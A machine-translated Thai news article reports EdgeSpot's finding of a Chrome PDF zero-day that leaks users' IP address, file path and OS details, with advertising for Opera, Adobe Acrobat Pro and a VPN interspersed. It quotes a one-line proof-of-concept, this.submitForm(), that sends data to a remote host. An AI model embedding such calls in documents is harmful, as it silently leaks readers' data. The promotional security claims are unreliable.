บั๊กของ Chrome ช่วยให้แฮกเกอร์รวบรวมข้อมูลผู้ใช้ผ่านไฟล์ PDF ได้

EdgeSpot ค้นพบช่องโหว่ Zero-day ที่น่าสนใจซึ่งใช้ประโยชน์จากเอกสาร PDF ใน Chrome
นี้ จุดอ่อน สามารถทำร้ายคุณได้โดยการรวบรวมข้อมูลที่สำคัญบนพีซีของคุณ
สำรวจของเรา หน้าเว็บและคลาวด์ สำหรับข้อมูลเชิงลึกเพิ่มเติมเกี่ยวกับเครื่องมือและบริการอื่นๆ
หากคุณสนใจเบราว์เซอร์ เรามีข้อมูลมากมายเกี่ยวกับเบราว์เซอร์ของเรา บราวเซอร์ฮับ.

บั๊กของ Chrome ช่วยให้แฮกเกอร์รวบรวมข้อมูลผู้ใช้จากไฟล์ PDF ของคุณได้ your

แล้วการใช้ตัวจัดการเอกสารที่ดีที่สุดล่ะ?
ทำให้เอกสารทั้งหมดของคุณสามารถเข้าถึงได้และปลอดภัยโดยใช้ Adobe Acrobat Reader เครื่องมือจัดการเอกสารนี้จะช่วยให้คุณเซ็นชื่ออิเล็กทรอนิกส์และสร้างแบบฟอร์มทางการเพื่อประหยัดเวลาในการทำงาน รับมันสำหรับพีซีของคุณและคุณจะสามารถ:

เปิด พิมพ์ และแก้ไข PDF และไฟล์ประเภทอื่นๆ ทั้งหมดของคุณ
กรอกแบบฟอร์ม PDF ได้ง่ายขึ้น
เข้ารหัสเอกสารสำคัญของคุณ

รับทุกแอพในราคาพิเศษ!

ซอฟต์แวร์การจัดการเอกสาร Nr.1 ของโลกอยู่ในราคาสุดคุ้ม รีบเลย!

บริการตรวจจับหาประโยชน์ EdgeSpot ค้นพบสิ่งที่น่าสนใจ โครเมียม ช่องโหว่ zero-day ที่ใช้ประโยชน์จากเอกสาร PDF

ช่องโหว่ทำให้ผู้โจมตีสามารถ เก็บเกี่ยวข้อมูลที่ละเอียดอ่อน โดยใช้เอกสาร PDF ที่เป็นอันตรายที่เปิดใน Chrome

instagram story viewer

ทันทีที่เหยื่อเปิดไฟล์ PDF ที่เกี่ยวข้องใน Google Chrome โปรแกรมที่เป็นอันตรายจะเริ่มทำงานในเบื้องหลังโดยการรวบรวมข้อมูลผู้ใช้

ข้อมูลจะถูกส่งต่อไปยังเซิร์ฟเวอร์ระยะไกลซึ่งถูกควบคุมโดยแฮกเกอร์ คุณอาจสงสัยว่าผู้โจมตีกำลังดูดข้อมูลใด พวกเขากำหนดเป้าหมายข้อมูลต่อไปนี้ในพีซีของคุณ:

ที่อยู่ IP
เส้นทางแบบเต็มของไฟล์ PDF บนระบบ
เวอร์ชัน OS และ Chrome

ระวังไฟล์ PDF ที่แฝงมัลแวร์

ผู้เชี่ยวชาญ ด่าง ว่าหนึ่งในสองโดเมน readnotify[.]com หรือ burpcollaborator[.]net กำลังได้รับข้อมูล

พวกเขาเปิดเผยว่าผู้โจมตีกำลังใช้ this.submitForm() PDF Javascript API เพื่อรวบรวมข้อมูลที่สำคัญของผู้ใช้

เราทดสอบด้วย PoC ขั้นต่ำ การเรียก API แบบง่าย ๆ เช่น this.submitForm(' http://google.com/test’) จะทำให้ Google Chrome ส่งข้อมูลส่วนตัวไปที่ google.com

บั๊กของ Chrome นี้ถูกโจมตีโดยไฟล์ PDF ที่เป็นอันตรายสองชุดที่แตกต่างกัน โดยทั้งสองไฟล์เผยแพร่ในเดือนตุลาคม 2017 และกันยายน 2018 ตามลำดับ

ผู้โจมตีสามารถใช้ข้อมูลที่เก็บรวบรวมเพื่อปรับแต่งการโจมตีในอนาคต รายงานแนะนำว่าไฟล์ชุดแรกถูกคอมไพล์โดยใช้บริการติดตาม PDF ของ ReadNotify

ผู้ใช้สามารถใช้บริการเพื่อติดตามการดูของผู้ใช้ EdgeSpot ไม่ได้เปิดเผยรายละเอียดใดๆ เกี่ยวกับลักษณะของไฟล์ PDF ชุดที่สอง

เคล็ดลับง่ายๆ: เปลี่ยนเบราว์เซอร์ของคุณเป็น Opera

ในช่วงเวลาที่ยากลำบากเหล่านี้ เราถูกโจมตีด้วยมัลแวร์ ฟิชชิ่ง และโทรจันในทุกขั้นตอน ดังนั้น เราจึงต้องระมัดระวังตัวมากขึ้นและได้รับการปกป้อง

และเนื่องจากนี่เป็นปัญหาเฉพาะสำหรับ Chrome คุณจึงสามารถหลีกเลี่ยงภัยคุกคามนั้นและปัญหาอื่นๆ ทั้งหมดได้ด้วยเบราว์เซอร์ที่เน้นความปลอดภัย เช่น โอเปร่า.

เบราว์เซอร์นี้มาพร้อมกับตัวบล็อกโฆษณาในตัวที่ไม่เพียงแต่ล้างสิ่งรบกวน แต่ยังบล็อก สคริปต์การวิเคราะห์ พิกเซลการติดตาม และวิธีการรวบรวมข้อมูลของคุณ

และถ้าคุณต้องการแน่ใจว่าคุณอยู่ห่างจากภยันตรายใด ๆ ให้หลบเลี่ยงในตัว VPN บริการที่ใช้งานได้ฟรี 100% ไม่จำกัดเวลา

โอเปร่า

Opera เสนอการป้องกันภัยคุกคามที่สมบูรณ์แบบด้วยตัวบล็อกโฆษณาและบริการ VPN ฟรี!

รับฟรี
เข้าไปดูในเว็บไซต์

ฉันจะได้รับการปกป้องจากช่องโหว่ PDF ได้อย่างไร

ดาวน์โหลด Adobe Acrobat PRO

Adobe และ Chrome เข้ากันได้ดีกับการจัดการไฟล์ PDF ด้วยการติดตั้ง Adobe Extension สำหรับ Chrome คุณสามารถตรวจสอบและจัดการ PDF ตามที่คุณต้องการโดยไม่ต้องออกจากเบราว์เซอร์ที่คุณชื่นชอบ

แม้จะมีโครงสร้างที่แข็งแกร่ง แต่มัลแวร์ที่ซ่อนอยู่ในไฟล์ PDF อาจไม่ถูกตรวจพบหากคุณใช้ Reader เวอร์ชันมาตรฐาน

ขอแนะนำให้ใช้เวอร์ชันมืออาชีพเพื่อรับประกันการปกป้องของคุณและเก็บข้อมูลของคุณให้ห่างจากแฮกเกอร์

แม้ว่าจะไม่ฟรี แต่ราคาที่คุณจะจ่ายนั้นค่อนข้างเล็กสำหรับคุณสมบัติเพิ่มเติมมากมายที่คุณจะเพลิดเพลิน รวมถึงการรักษาความปลอดภัยขั้นสูงของไฟล์ PDF ของคุณ

นอกจากนี้ยังมีการทดลองใช้ฟรี 7 วันเพื่อให้คุณได้สัมผัสกับประสบการณ์ Pro เต็มรูปแบบก่อนตัดสินใจซื้อ

Adobe Acrobat PRO

อยู่ห่างจากมัลแวร์โดยการดาวน์โหลด Adobe Acrobat PRO มีคุณลักษณะมากมายมากกว่าเวอร์ชันฟรีและช่วยให้ข้อมูลของคุณปลอดภัย

ทดลองฟรี
เข้าไปดูในเว็บไซต์

ในกรณีที่คุณต้องการความปลอดภัยในขณะที่ท่องอินเทอร์เน็ต คุณจะต้องได้รับเครื่องมือที่ครบครันเพื่อรักษาความปลอดภัยเครือข่ายของคุณ ติดตั้งการเข้าถึงอินเทอร์เน็ตส่วนตัวทันที และปลอดภัยในตัวเอง ปกป้องพีซีของคุณจากการโจมตีขณะเรียกดู ปิดบังที่อยู่ IP ของคุณและบล็อกการเข้าถึงที่ไม่ต้องการทั้งหมด

บริการตรวจจับ Exploit EdgeSpot ต้องการเตือนผู้ใช้ Chrome เกี่ยวกับความเสี่ยงที่อาจเกิดขึ้น เนื่องจากโปรแกรมแก้ไขไม่คาดว่าจะออกในอนาคตอันใกล้นี้

EdgeSpot รายงานต่อ Google เกี่ยวกับช่องโหว่นี้ในปีที่แล้ว และบริษัทสัญญาว่าจะออกแพตช์ในปลายเดือนเมษายน

อย่างไรก็ตาม คุณสามารถลองใช้วิธีแก้ปัญหาชั่วคราวโดยดูเอกสาร PDF ที่ได้รับในเครื่องโดยใช้แอปตัวอ่านอื่น

อีกวิธีหนึ่ง คุณยังสามารถเปิดเอกสาร PDF ใน Chrome โดยยกเลิกการเชื่อมต่อระบบของคุณจากอินเทอร์เน็ต

คำถามที่พบบ่อย

แบดเจอร์ความเป็นส่วนตัวทำงานร่วมกับ Chrome ได้หรือไม่
ใช่แล้ว. แต่ถ้าคุณต้องการตัวเลือกที่กว้างขึ้น สำรวจตัวเลือกอันดับต้น ๆ ของเราสำหรับ โครเมียมความเป็นส่วนตัว นามสกุลใน คู่มือฉบับสมบูรณ์นี้.
คุณสามารถแก้ไข PDF ใน Chrome ได้หรือไม่
ตู่นี่คือส่วนขยายมากมายที่อนุญาต PDFs การประมวลผล ตรวจสอบ ของเรา คู่มือที่ยอดเยี่ยม เกี่ยวกับส่วนขยาย PDF ที่ดีที่สุดสำหรับ Chrome
Google มีโปรแกรมสร้างรหัส QR หรือไม่
ไม่ได้ แต่คุณสามารถเปิดใช้งานได้อย่างรวดเร็ว นี่คือของเรา คู่มือที่ครอบคลุม เกี่ยวกับวิธีการเปิดใช้งานตัวสร้างรหัส QR ใน Chrome